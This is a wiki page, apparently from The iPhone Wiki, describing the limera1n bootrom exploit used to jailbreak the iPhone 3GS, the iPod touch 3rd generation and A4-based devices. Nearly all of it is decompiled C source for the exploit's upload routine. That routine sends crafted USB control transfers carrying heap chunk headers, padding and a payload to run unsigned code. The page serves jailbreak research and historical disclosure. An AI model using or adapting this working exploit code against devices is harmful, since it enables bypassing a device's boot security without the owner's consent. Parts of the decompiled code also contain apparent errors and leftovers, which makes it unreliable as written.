|
The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
limera1n Exploit
Revision as of 01:18, 26 September 2014 by Ryandolan123 (talk | contribs)
The limera1n exploit is the bootrom exploit used to run unsigned code (and thereby jailbreak) the iPod touch 3rd Generation, the iPhone 3GS and all A4-based devices. It was first used in the limera1n tool by geohot. It is used to perform a tethered jailbreak on the aforementioned devices. The jailbreak can then be turned into an untethered jailbreak with other exploits, such as the 0x24000 Segment Overflow or the Packet Filter Kernel Exploit. limera1n is the final publicly disclosed bootrom exploit of any device. The last device released vulnerable to limera1n is the iPhone 4 (CDMA).
Source Code
signed int __cdecl upload_exploit() {
int device_type;
signed int payload_address;
int free_address;
int deviceerror;
char *chunk_headers_ptr;
unsigned int sent_counter;
//int v6;
signed int result;
//signed int v8;
int recv_error_code;
signed int payload_address2;
signed int padding_size;
char payload;
char chunk_headers;
//int v14;
//v14 = *MK_FP(__GS__, 20);
device_type = *(_DWORD *)(device + 16);
if ( device_type == 8930 ) {
padding_size = 0x2A800;
payload_address = 0x8402B001;
free_address = 0x8403BF9C;
} else {
payload_address = 0x84023001;
padding_size = 0x22800;
// free_address = (((device_type == 8920) – 1) & 0xFFFFFFF4) – 0x7BFCC05C;
if(device_type == 8920) free_address = 0x84033FA4;
else free_address = 84033F98;
}
memset(&payload, 0, 0x800);
memcpy(&payload, exploit, 0x230);
if (libpois0n_debug) {
//v8 = payload_address;
fprintf(stderr, 1, "Resetting device counters\n");
//payload_address = v8;
}
payload_address2 = payload_address;
deviceerror = irecv_reset_counters(client);
if ( deviceerror ) {
irecv_strerror(deviceerror);
fprintf(stderr, 1, &aCannotFindS[12]);
result = -1;
} else {
memset(&chunk_headers, 0xCC, 0x800);
chunk_headers_ptr = &chunk_headers;
do {
*(_DWORD *)chunk_headers_ptr = 1029;
*((_DWORD *)chunk_headers_ptr + 1) = 257;
*((_DWORD *)chunk_headers_ptr + 2) = payload_address2;
*((_DWORD *)chunk_headers_ptr + 3) = free_address;
chunk_headers_ptr += 64;
} while ((int *)chunk_headers_ptr != &v14);
if (libpois0n_debug)
fprintf(stderr, 1, "Sending chunk headers\n");
sent_counter = 0;
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);
memset(&chunk_headers, 0xCC, 0x800);
do {
sent_counter += 0x800;
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);
} while (sent_counter < padding_size);
if (libpois0n_debug)
fprintf(stderr, 1, "Sending exploit payload\n");
irecv_control_transfer(client, 0x21, 1, 0, 0, &payload, 0x800);
if (libpois0n_debug)
fprintf(stderr, 1, "Sending fake data\n");
memset(&chunk_headers, 0xBB, 0x800);
irecv_control_transfer(client, 0xA1, 1, 0, 0, &chunk_headers, 0x800);
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);
if (libpois0n_debug)
fprintf(stderr, 1, "Executing exploit\n");
irecv_control_transfer(client, 0x21, 2, 0, 0, &chunk_headers, 0);
irecv_reset(client);
irecv_finish_transfer(client);
if (libpois0n_debug) {
fprintf(stderr, 1, "Exploit sent\n");
if (libpois0n_debug)
fprintf(stderr, 1, "Reconnecting to device\n");
}
client = (void *)irecv_reconnect(client, 2);
if (client) {
result = 0;
} else {
if (libpois0n_debug) {
recv_error_code = irecv_strerror(0);
fprintf(stderr, 1, &aCannotFindS[12], recv_error_code);
}
fprintf(stderr, 1, "Unable to reconnect\n");
result = -1;
}
}
// compiler stack check
//if (*MK_FP(__GS__, 20) != v14)
// __stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);
return result;
}
